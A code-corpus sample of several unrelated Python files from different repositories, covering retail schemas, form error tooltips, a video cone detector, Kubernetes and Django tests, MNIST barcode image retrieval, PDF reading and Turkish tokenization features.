| 3.5 | 4 |
retailstore/serializers/schemas.py | code-R/retail_app | 2 | 12799094 | <filename>retailstore/serializers/schemas.py<gh_stars>1-10
from marshmallow import fields, Schema
class BaseSchema(Schema):
id = fields.Integer()
name = fields.String(required=True)
description = fields.String()
created_at = fields.DateTime(attribute="created_at")
class LocationSchema(BaseSchema):
def hiera_data(self, location):
res = {
'name': location.name,
'children': []
}
departments = location.departments
department_schema = DepartmentSchema()
for department in departments:
res['children'].append(
department_schema.hiera_data(department))
return res
class DepartmentSchema(BaseSchema):
location_id = fields.Integer()
def hiera_data(self, department):
res = {
'name': department.name,
'children': []
}
categories = department.categories
category_schema = CategorySchema()
for category in categories:
res['children'].append(
category_schema.hiera_data(category))
return res
class CategorySchema(BaseSchema):
department_id = fields.Integer()
def hiera_data(self, category):
res = {
'name': category.name,
'children': []
}
sub_categories = category.sub_categories
for sub_category in sub_categories:
res['children'].append({
"name": sub_category.name
})
return res
class SubCategorySchema(BaseSchema):
category_id = fields.Integer()
| 2.5625 | 3 |
flare/forms/formerrors.py | xnopasaranx/flare | 0 | 12799095 | from typing import List, Tuple
#from flare.forms.bones.base import ReadFromClientErrorSeverity
from flare.icons import SvgIcon
from flare.i18n import translate
from flare import html5
def collectBoneErrors(errorList, currentKey,boneStructure):
'''
severity:
NotSet = 0
InvalidatesOther = 1
Empty = 2
Invalid = 3
'''
boneErrors = []
for error in errorList or []:
if error["fieldPath"] and error["fieldPath"][0] == currentKey:
isError = False
if (error["severity"] == 0 or error["severity"] == 2) and boneStructure["required"]:
isError = True
elif error["severity"] ==3:
isError = True
# ToDO Field dependency!
if isError:
thisError = error.copy()
thisError["fieldPath"] = error["fieldPath"][1:]
boneErrors.append(thisError)
return boneErrors
class ToolTipError(html5.Div):
"""
Small utility class for providing tooltips
"""
def __init__(self, shortText="", longText="", *args, **kwargs):
super( ToolTipError, self ).__init__( *args, **kwargs )
self["class"] = "vi-tooltip msg msg--error is-active is-open"
self.sinkEvent("onClick")
self.prependChild( SvgIcon( "icon-arrow-right", title = shortText ) )
#language=HTMl
self.fromHTML("""
<div class="msg-content" [name]="tooltipMsg">
<h2 class="msg-headline" [name]="tooltipHeadline"></h2>
<div class="msg-descr" [name]="tooltipDescr"></div>
</div>
""")
self.tooltipHeadline.element.innerHTML = translate("vi.tooltip.error")
self.tooltipDescr.element.innerHTML = longText.replace( "\n", "<br />" )
def onClick(self, event):
self.toggleClass("is-open")
def _setDisabled(self, disabled):
return
def _getDisabled(self):
return False
#Not used
def buildBoneErrors(errorList):
boneErrors = {}
for error in errorList:
thisError = error.copy()
thisError[ "fieldPath" ] = error[ "fieldPath" ][ 1: ]
if error[ "fieldPath" ] and error[ "fieldPath" ][ 0 ] not in boneErrors:
boneErrors.update({error[ "fieldPath" ][ 1 ]:[thisError]})
else:
boneErrors[error[ "fieldPath" ][ 1 ]].append(thisError)
return boneErrors
def checkErrors(bone) -> Tuple[bool, List[str]]:
'''
first return value is a shortcut to test if bone is valid or not
second returns a list of fields which are invalid through this bone
'''
errors = bone["errors"]
#no errors for this bone
if not errors:
return False, list()
invalidatedFields = list()
isInvalid = True
for error in errors:
if (
(error["severity"] == ReadFromClientErrorSeverity.Empty and bone["required"]) or
(error["severity"] == ReadFromClientErrorSeverity.InvalidatesOther)
):
if error["invalidatedFields"]:
invalidatedFields.extend(error["invalidatedFields"])
# We found only warnings
if not invalidatedFields:
return False, list()
return isInvalid, invalidatedFields
| 2.109375 | 2 |
nacelle/contrib/mail/utils.py | paddycarey/nacelle | 0 | 12799096 | <filename>nacelle/contrib/mail/utils.py<gh_stars>0
"""Utilities used to render and send emails
"""
# marty mcfly imports
from __future__ import absolute_import
# third-party imports
from nacelle.core.template.renderers import render_jinja2_template
def render_email(template, context=None):
"""Uses Jinja2 to render the email
"""
if context is None:
context = {}
email_body = render_jinja2_template(template, context)
return email_body
| 1.5 | 2 |
test_scripts/ssd_on_video.py | ajinkyakhoche/Object-Detection-Project | 0 | 12799097 | import cv2
import numpy as numpy
import tensorflow as tflow
from utils import label_map_util
#from ConeDetection import *
from cone_img_processing2 import *
import os
# Set threshold for detection of cone for object detector
threshold_cone = 0.5
#Set path to check point and label map
#PATH_TO_CKPT = './frozen_orange_net.pb'
PATH_TO_CKPT = './frozen_weights/frozen_cone_graph_modified.pb'
#PATH_TO_CKPT = './frozen_weights/mobilenet_v2_0.75_224_frozen.pb'
PATH_TO_LABELS = './test_scripts/label_map.pbtxt'
#Define no, of classes
NUM_CLASSES = 1 #only one class, i.e. cone
## Load a (frozen) Tensorflow model into memory.
detection_graph = tflow.Graph()
with detection_graph.as_default():
od_graph_def = tflow.GraphDef()
with tflow.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tflow.import_graph_def(od_graph_def, name='')
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
gpu_options = tflow.GPUOptions(per_process_gpu_memory_fraction=0.4)
#config=tflow.ConfigProto(gpu_options=gpu_options)
def mainLoop():
# Try the following videos:
# 20180619_175221224 # shade to brightness
# 20180619_180755490 # towards sun
# 20180619_180515860 # away from sun
cap = cv2.VideoCapture('./test_videos/20180619_175221224.mp4')
#cap = cv2.VideoCapture('./test_videos/Formula Student Spain 2015 Endurance- DHBW Engineering with the eSleek15.mp4')
frameCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(cap.get(cv2.CAP_PROP_FPS))
count = 0
img_number = 1000
with detection_graph.as_default():
#with tflow.Session(graph=detection_graph) as sess:
with tflow.Session(graph=detection_graph, config=tflow.ConfigProto(gpu_options=gpu_options)) as sess:
while count < frameCount:
ret, image_np = cap.read()
if ret == True:
count = count + 1
# image_np = cv2.resize(processFrame.image, (0,0), fx=0.5, fy=0.5)
#image_np = processFrame.image
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
# Definition of boxes [ymin, xmin, ymax, xmax]
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
width = image_np.shape[1]
height = image_np.shape[0]
# width, height = cv2.GetSize(image_np)
output_img = image_np.copy()
for i in range(boxes.shape[0]):
if np.all(boxes[i] == 0) or scores[i] < threshold_cone:
continue
b = boxes[i]
box_width = np.abs(float(b[3])-float(b[1]))
box_height = np.abs(float(b[2])-float(b[0]))
x = int(b[1] * width)
y = int(b[0] * height)
h = int(box_height * height)
w = int(box_width * width)
candidate = image_np[y:y+h, x:x+w]
# if count % (2*fps) == 0:
# # Save the image (optional)
# cv2.imwrite('./test_videos/cone_samples/' + str(img_number) + '.jpg', candidate)
# img_number = img_number + 1
y = y + 1
z = 0
result = detectCone1(candidate)
# print(result)
if result == 0:
print("Yellow Cone")
cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (0, 255, 255), 7)
cv2.putText(output_img, 'yellow cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
if result == 1:
print("Blue Cone")
cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (255, 0, 0), 7)
cv2.putText(output_img, 'blue cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
if result == 2:
print("Orange Cone")
cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (0,165,255), 7)
cv2.putText(output_img, 'orange cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.imshow('object detection', cv2.resize(output_img, (image_np.shape[1],image_np.shape[0])))
cv2.waitKey(1)
cv2.destroyAllWindows()
if __name__ == '__main__':
mainLoop()
| 2.421875 | 2 |
kubernetes/test/test_v2beta2_metric_spec.py | mariusgheorghies/python | 0 | 12799098 | <gh_stars>0
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import kubernetes.client
from kubernetes.client.models.v2beta2_metric_spec import V2beta2MetricSpec # noqa: E501
from kubernetes.client.rest import ApiException
class TestV2beta2MetricSpec(unittest.TestCase):
"""V2beta2MetricSpec unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test V2beta2MetricSpec
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = kubernetes.client.models.v2beta2_metric_spec.V2beta2MetricSpec() # noqa: E501
if include_optional :
return V2beta2MetricSpec(
container_resource = kubernetes.client.models.v2beta2/container_resource_metric_source.v2beta2.ContainerResourceMetricSource(
container = '0',
name = '0',
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
external = kubernetes.client.models.v2beta2/external_metric_source.v2beta2.ExternalMetricSource(
metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier(
name = '0',
selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector(
match_expressions = [
kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement(
key = '0',
operator = '0',
values = [
'0'
], )
],
match_labels = {
'key' : '0'
}, ), ),
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
object = kubernetes.client.models.v2beta2/object_metric_source.v2beta2.ObjectMetricSource(
described_object = kubernetes.client.models.v2beta2/cross_version_object_reference.v2beta2.CrossVersionObjectReference(
api_version = '0',
kind = '0',
name = '0', ),
metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier(
name = '0',
selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector(
match_expressions = [
kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement(
key = '0',
operator = '0',
values = [
'0'
], )
],
match_labels = {
'key' : '0'
}, ), ),
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
pods = kubernetes.client.models.v2beta2/pods_metric_source.v2beta2.PodsMetricSource(
metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier(
name = '0',
selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector(
match_expressions = [
kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement(
key = '0',
operator = '0',
values = [
'0'
], )
],
match_labels = {
'key' : '0'
}, ), ),
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
resource = kubernetes.client.models.v2beta2/resource_metric_source.v2beta2.ResourceMetricSource(
name = '0',
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
type = '0'
)
else :
return V2beta2MetricSpec(
type = '0',
)
def testV2beta2MetricSpec(self):
"""Test V2beta2MetricSpec"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 1.984375 | 2 |
api_products/tests.py | arunjohn96/Abacies | 0 | 12799099 | from rest_framework.test import APITestCase
from django.shortcuts import reverse
from rest_framework import status
from core.models import ProductsTbl, PurchaseTransactionTbl
# Create your tests here.
class TestProductViews(APITestCase):
def setUp(self):
self.product_url = reverse('products-list')
self.product_data = {
'product_id': 10215,
'name': '<NAME>',
'quantity': 105,
'unit_price': 100.00
}
def test_cannot_create_products(self):
res = self.client.post(self.product_url)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_product(self):
res = self.client.post(self.product_url, self.product_data)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
self.assertEqual(res.data['product_id'],
self.product_data['product_id'])
self.assertEqual(res.data['name'], self.product_data['name'])
self.assertEqual(res.data['quantity'], self.product_data['quantity'])
class TestPurchaseViews(APITestCase):
def setUp(self):
self.purchase_url = reverse('purchases-list')
self.purchase_data = {
'product_id': 10215,
'purchase_id': '8d7qdouiabnsdodAY9DQJp09',
'purchased_quantity': 90,
}
self.product = ProductsTbl.objects.create(
product_id=10216,
name='<NAME>',
quantity=100,
unit_price=100.00
)
self.purchase = PurchaseTransactionTbl.objects.create(
product=self.product,
purchase_id='d6asd65asd654as5d4',
purchased_quantity=75
)
self.purchase_detail_url = reverse(
'purchases-detail', kwargs={'pk': self.purchase.pk})
def test_cannot_create_purchase(self):
res = self.client.post(self.purchase_url)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_create_purchase_wrong_data(self):
res = self.client.post(self.purchase_url, self.purchase_data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_purchase_with_data(self):
product = ProductsTbl.objects.create(
product_id=10215,
name='<NAME>',
quantity=105,
unit_price=100.00
)
qty = product.quantity
res = self.client.post(self.purchase_url, self.purchase_data)
new_qty = ProductsTbl.objects.get(
product_id=res.data['product_id']).quantity
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
self.assertEqual(res.data['product_id'],
self.purchase_data['product_id'])
self.assertEqual(res.data['purchase_id'],
self.purchase_data['purchase_id'])
self.assertEqual(res.data['purchased_quantity'],
self.purchase_data['purchased_quantity'])
self.assertEqual(
new_qty, (qty - self.purchase_data['purchased_quantity']))
def test_cannot_update_purchase(self):
res = self.client.put(self.purchase_detail_url)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_update_purchase(self):
data = {'purchased_quantity': 50}
qty = self.product.quantity
old_qty = self.purchase.purchased_quantity
new_qty = data['purchased_quantity']
qty = qty - (new_qty - old_qty)
res = self.client.put(self.purchase_detail_url, data)
check_qty = ProductsTbl.objects.get(id=self.product.pk).quantity
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data['purchased_quantity'],
data['purchased_quantity'])
self.assertEqual(qty, check_qty)
def test_cannot_delete_purchase(self):
res = self.client.delete(
reverse('purchases-detail', kwargs={'pk': 100}))
self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_purchase(self):
qty = self.product.quantity
purchase_quantity = self.purchase.purchased_quantity
res = self.client.delete(self.purchase_detail_url)
new_qty = ProductsTbl.objects.get(id=self.product.id).quantity
self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(new_qty, (qty + purchase_quantity))
class TestRefillView(APITestCase):
def setUp(self):
self.product = ProductsTbl.objects.create(
product_id=10001,
name='<NAME>',
quantity=100,
unit_price=2500
)
self.url = reverse('refill-list')
def test_cannot_refill(self):
res = self.client.post(self.url)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_refill_wrong_data(self):
data = {
'product_id':1000,
'refill_count':100,
}
res = self.client.post(self.url, data)
self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
def test_refill(self):
data ={
'product_id':self.product.product_id,
'refill_count':1000
}
quantity = self.product.quantity
new_qty = quantity+data['refill_count']
res = self.client.post(self.url,data)
check_qty = ProductsTbl.objects.get(id=self.product.pk).quantity
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(check_qty,new_qty)
| 2.515625 | 3 |
search_similar_image.py | airwick989/Content-Based-Image-Retrieval | 1 | 12799100 | import cv2
from PIL import Image
import numpy as np
import constants
import os
import math
import matplotlib.pyplot as plt
import time
def hammingDistance(v1, v2):
t = 0
for i in range(len(v1)):
if v1[i] != v2[i]:
t += 1
return t
# read thresholds from thresholds.txt and then store them into thresholds list
thresholds = []
with open('./thresholds.txt', 'r') as f:
threshold = f.readline()
while threshold:
threshold = threshold.rstrip("\n")
thresholds.append(float(threshold))
threshold = f.readline()
f.close()
# read barcode and image location from barcodes.txt file
imageLocations = []
barcodes = []
with open("barcodes.txt", 'r') as f:
line = f.readline()
while line:
line = line.rstrip("\n")
line = line.split(",")
imageLocation = line.pop()
barcode = []
for bit in line:
barcode.append(int(bit))
imageLocations.append(imageLocation)
barcodes.append(barcode)
line = f.readline()
f.close()
def create_barcode(imagePath):
barcode = []
opcv = cv2.imread(imagePath, 0) # read image file as cv2 image
# ret2, th2 = cv2.threshold(opcv, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU) # apply threshold it just makes pixel values either black or white
img = Image.fromarray(opcv) # create image from thresholded 2d image array
barcode = []
degree = constants.MIN_DEGREE
while degree < constants.MAX_DEGREE: # loop through MIN_DEGREE to MAX_DEGREE by STEP_DEGREE
currentProjectionThreshold = int(degree / constants.STEP_DEGREE) # find the appropriate threshold index
rotated_image = img.rotate(degree) # rotate the image
image2d = np.array(rotated_image) # get 2d representation of the rotated image
for row in image2d: # loop through each row in thresholded image
row_sum = 0 # initialize row pixel counter
for pixel in row: # loop through each pixel in the row
pixel = pixel / 255 # since we have either 0 or 255 as a pixel value divide this number by 255 to get 0 or 1 which is there is pixel or there is not
row_sum+=pixel # sum of pixels across a single row
# thresholds the sum of the row to 1 or 0 based on calculated threshold
if row_sum >= thresholds[currentProjectionThreshold]:
barcode.append(1)
else:
barcode.append(0)
degree += constants.STEP_DEGREE
return barcode
class CalculateAccuracyHitRatio:
def __init__(self, barcodes, imageLocations):
self.barcodes = barcodes
self.imageLocations = imageLocations
def calculateAccuracy(self):
accuracy = lambda x : x / 100
successCount = 0
for currDigit in range(constants.NUMBER_OF_DIGITS): # loop through 0 to NUMBER_OF_DIGITS-1
directory = r'./MNIST_DS/{}'.format(currDigit) # digit folder path
for imageName in os.listdir(directory): # loop thorugh every file in the directory
print("Checking image {}".format(os.path.join(directory, imageName)))
searchBarcode = create_barcode(os.path.join(directory, imageName))
s, hd, resultImgLoc, resultImgBarcode = self.checkSuccess(searchBarcode, currDigit)
print("\tHamming Distance: {}\n\tResult Image: {}".format(hd, resultImgLoc))
# time.sleep(0.5/4)
if s:
successCount += 1
hitRatio = accuracy(successCount)
return hitRatio
def checkSuccess(self, searchBarcode, searchDigitGroup):
success = False # variable for holding the success information
minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1 # Minimum Hamming Distance. It is (maxiumum hamming distance + 1) by default
minBarcode = None # barcode that corresponds to the minimum hamming distance
imageLoc = None # result image location
for i, barcode in enumerate(self.barcodes): # loop through every barcode in the barcodes list
currentHMD = hammingDistance( barcode, searchBarcode) # check each bit in both barcodes and calculate how many of these not same
if currentHMD == 0: # hamming distance 0 means the barcodes are identical which means they are the same image
continue # skip
elif currentHMD < minHMD: # if the current calculated hamming distance is less than the minimum hamming distance
minHMD = currentHMD # then set minimum hamming distance to current calculated hamming distance
minBarcode = barcode # set the current barcode as
imageLoc = self.imageLocations[i]
resultDigitGroup = imageLoc.split("_", 1)[0]
if int(resultDigitGroup) == int(searchDigitGroup):
success = True
return success, minHMD, imageLoc, minBarcode
class SearchSimilar:
def __init__(self):
self.digitSelectMenu()
def findSimilar(self, inputBarcode):
minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1
print(minHMD)
minBarcode = None
imageLoc = None
for i, barcode in enumerate(barcodes):
print(imageLocations[i])
currentHMD = hammingDistance( barcode, inputBarcode)
print(currentHMD)
if currentHMD == 0:
continue
elif currentHMD < minHMD:
minHMD = currentHMD
minBarcode = barcode
imageLoc = imageLocations[i]
return minHMD, minBarcode, imageLoc
def digitSelectMenu(self):
digitFolder = int(input("enter a digit (0 - 9): "))
while digitFolder >= 0 and digitFolder <= 9:
directory = r'.\MNIST_DS\{}'.format(digitFolder)
for c, imageName in enumerate(os.listdir(directory)):
print(c , " - ", imageName)
selectImage = int(input("select image from above list: "))
selectedImagePath = os.path.join(directory, os.listdir(directory)[selectImage])
print(selectedImagePath)
selectedImageBarcode = create_barcode(selectedImagePath)
minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1
print(minHMD)
minBarcode = None
imageLoc = None
for i, barcode in enumerate(barcodes):
print(imageLocations[i])
currentHMD = hammingDistance( barcode,selectedImageBarcode)
print(currentHMD)
if currentHMD == 0:
continue
elif currentHMD < minHMD:
minHMD = currentHMD
minBarcode = barcode
imageLoc = imageLocations[i]
print("Result:")
print("\tHD: {}".format(minHMD))
print("\tImage Location: {}".format(imageLoc))
print("\tBarcode: {}".format(minBarcode))
fig = plt.figure(figsize=(10, 7))
fig.suptitle("Hamming Distance: {}".format(minHMD))
rows, columns = 2, 2
selectedImage = cv2.imread(selectedImagePath)
resultImageRelativePath = imageLoc.split("_", 1)
resultImagePath = os.path.join(r".\MNIST_DS", r"{}\{}".format(resultImageRelativePath[0], resultImageRelativePath[1]))
resultImage = cv2.imread(resultImagePath)
from create_barcode_image import BarcodeImageGenerator as big
big.generate_barcode_image(selectedImageBarcode, r".\temp\searchImage.png")
big.generate_barcode_image(minBarcode, r".\temp\resultImage.png")
searchBarcodeImage = cv2.imread(r".\temp\searchImage.png")
resultBarcodeImage = cv2.imread(r".\temp\resultImage.png")
fig.add_subplot(rows, columns, 1)
plt.imshow(selectedImage)
plt.axis("off")
plt.title("Search Image")
fig.add_subplot(rows, columns, 2)
plt.imshow(resultImage)
plt.axis("off")
plt.title("Result Image")
fig.add_subplot(rows, columns, 3)
plt.imshow(searchBarcodeImage)
plt.axis("off")
plt.title("Search Barcode")
fig.add_subplot(rows, columns, 4)
plt.imshow(resultBarcodeImage)
plt.axis("off")
plt.title("Result Barcode")
plt.show()
digitFolder = int(input("enter a digit (0 - 9): "))
def showAllResults(self):
fig = plt.figure(figsize=(16,100), dpi=100)
rows, cols = constants.NUMBER_OF_DIGITS*constants.NUMBER_IMAGES, 2
for currDigit in range(constants.NUMBER_OF_DIGITS): # loop through 0 to NUMBER_OF_DIGITS-1
directory = r'./MNIST_DS/{}'.format(currDigit) # digit folder path
for i, imageName in zip((i for i in range(1, 20, 2)), os.listdir(directory)): # loop thorugh every file in the directory
selectedImagePath = os.path.join(directory, imageName)
print("Checking image {}".format(os.path.join(directory, imageName)))
searchBarcode = create_barcode(os.path.join(directory, imageName))
hmd, resultBarcode, resultImgLoc = self.findSimilar(searchBarcode)
selectedImage = cv2.imread(selectedImagePath)
resultImageRelativePath = resultImgLoc.split("_", 1)
resultImagePath = os.path.join(r".\MNIST_DS", r"{}\{}".format(resultImageRelativePath[0], resultImageRelativePath[1]))
resultImage = cv2.imread(resultImagePath)
sii = currDigit*20+i
fig.add_subplot(rows, cols, sii)
plt.imshow(selectedImage)
plt.axis("off")
plt.title(selectedImagePath, fontsize=9, y=0.90)
fig.add_subplot(rows, cols, sii+1)
plt.imshow(resultImage)
plt.axis("off")
plt.title(resultImagePath, fontsize=9, y=0.90)
return fig
import matplotlib
# Make sure that we are using QT5
matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
from PyQt5 import QtWidgets
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
class ScrollableWindow(QtWidgets.QMainWindow):
def __init__(self, fig):
self.qapp = QtWidgets.QApplication([])
QtWidgets.QMainWindow.__init__(self)
self.widget = QtWidgets.QWidget()
self.setCentralWidget(self.widget)
self.widget.setLayout(QtWidgets.QVBoxLayout())
self.widget.layout().setContentsMargins(0,0,0,0)
self.widget.layout().setSpacing(0)
self.fig = fig
self.canvas = FigureCanvas(self.fig)
self.canvas.draw()
self.scroll = QtWidgets.QScrollArea(self.widget)
self.scroll.setWidget(self.canvas)
self.nav = NavigationToolbar(self.canvas, self.widget)
self.widget.layout().addWidget(self.nav)
self.widget.layout().addWidget(self.scroll)
self.show()
exit(self.qapp.exec_())
if __name__ == "__main__":
print("Search Menu")
print("Calculate Accuracy Hit Ratio")
print("Show All Results at Once")
input("Yes I have read the above notes. Press Enter to continue...")
print("\n\n\nEnter a number between 0 and 9 to search image")
print("Enter a number smaller than 0 or greater than 9 to exit the search menu")
print("Once you exit Search Menu you will get Calculate Accuracy Hit Ratio ")
input("Yes I have read the above notes. Press Enter to continue...")
si = SearchSimilar() # search menu
print("\n\n\nCalculating accuracy hit ratio...")
cahr = CalculateAccuracyHitRatio(barcodes, imageLocations) # accuracy calculator
print("Accuracy is {}".format(cahr.calculateAccuracy())) # calculate and display the accuracy
input("Yes I have read the above notes. Press Enter to DISPLAY ALL THE RESULTS at Once...")
print("\n\n\nSearching all the images in the dataset and finding results...")
print("Once you get the window maximize the window and scrolldown to see the results")
input("Yes I have read the above notes. Press Enter to continue...")
fig = si.showAllResults()
a = ScrollableWindow(fig) | 3.21875 | 3 |
file-operations/pdf_operations.py | kpunith8/python_samples | 0 | 12799101 | <filename>file-operations/pdf_operations.py
# Use PyPDF2 library to work with pdf files
# It can only read text content, not the images and other media content
import PyPDF2
# read as binary file, make sure you pass the pdf file name
pdf_file = open("path-to-pdf.pdf", "rb")
pdf_reader = PyPDF2.PdfFileReader(pdf_file)
print("Number of pages in the pdf file:", pdf_reader.numPages)
# 0 based index
grab_a_page = pdf_reader.getPage(10)
print("Content of a given page is:", grab_a_page.extractText())
# # It allows to append an page to end but hard to add content to any page
# pdf_writer = PyPDF2.PdfFileWriter()
# pdf_writer.addPage(grab_a_page)
# Write the page 101 to a new file, it creates a new file
# output_file = open("new_pdf_file.pdf", "wb")
# pdf_writer.write(output_file)
pdf_file.close()
# output_file.close()
| 3.875 | 4 |
src/feature_extraction_tokenization.py | garsontrier/turkish-nlp-preprocessor | 1 | 12799102 | # Written by <NAME>
import os
def file_feature_extraction(dir, filename):
'''
Navigates through tokenized words,
reconstructs original form by following few rules
Then, extracts features for that token and adds them to the corresponding list
All features of the dataset is written in the same txt file.
Args:
dir: directory of the given file
filename: name of the input file
Returns:
'''
punc = '\',.\"?!-;:()' # % left out for now
quote_count = 0
x = [] # features
y = [] # labels
tokens = []
with open(dir+filename, 'r', encoding='utf8') as f:
for line in f.readlines(): # each token is kept on a different line
tokens.append(line.rstrip('\n'))
for token, i in zip(tokens, range(len(tokens))):
found = False
if token in punc: # for only punctuation tokens
if (token == '\'' or token == '\"') and quote_count % 2 == 0:
quote_count += 1
punc_type = punc.index(token)
try:
original_form = token + tokens[i + 1] #add try statements
label = 1 # punctuation is another token
pos = 0
found = True
except IndexError:
break
# send for feature extraction
elif (token == '\'' or token == '\"') and quote_count % 2 == 1:
quote_count += 1
punc_type = punc.index(token)
original_form = tokens[i - 1] + token
label = 1 # punctuation is another token
pos = len(original_form) - 1
found = True
# send for feature extraction
elif token == '.' or token == ',' or token == '?' or token == '!' or token == ';' or token == ':':
punc_type = punc.index(token)
original_form = tokens[i - 1] + token
label = 1
pos = len(original_form) - 1
found = True
#send for feature extraction
elif token == '(':
punc_type = punc.index(token)
try:
original_form = token + tokens[i + 1]
label = 1
pos = 0
found = True
except IndexError:
break
elif token == ')':
punc_type = punc.index(token)
original_form = tokens[i - 1] + token
label = 1
pos = 0
found = True
else: # for not only punctuation tokens
if token == '...':
punc_type = punc.index(token[0])
original_form = tokens[i - 1] + token
label = 1
pos = len(original_form) - 1
found = True
else:
for ch, j in zip(token, range(len(token))): # iterate through string to detect punctuations
punc_type = punc.find(ch)
if punc_type != -1: # punctuation is found
pos = j
original_form = token
label = 0
found = True
break
if found:
only_punc = True
for j in original_form:
if j not in punc:
case = int(j.isupper())
only_punc = False
break
if not only_punc:
x.append([punc_type, pos, len(original_form), case])
y.append(label)
return x, y
def token_feature_extraction(token):
'''
Args:
token: token whose features are going to be extracted
Returns:
features for the token
used during inference
'''
x = None
punc = '\',.\"?!-;:()' # % left out for now
for ch, j in zip(token, range(len(token))): # iterate through string to detect punctuations
punc_type = punc.find(ch)
if punc_type != -1: # punctuation is found
pos = j
original_form = token
break
only_punc = True
for j in original_form:
if j not in punc:
case = int(j.isupper())
only_punc = False
break
if not only_punc:
x = [punc_type, pos, len(original_form), case]
return x
if __name__ == '__main__':
x = []
y = []
dir = 'D:/Mansur/Boun/CMPE 561/assignments/assignment 1/42bin_haber/news/'
categories = os.listdir(dir)
for i in categories:
category_dir = dir + i + '/'
category_files = os.listdir(category_dir)
for j in category_files:
if '_tokenized' in j: # take only tokenized files
x_temp, y_temp = file_feature_extraction(category_dir, j)
x.extend(x_temp)
y.extend(y_temp)
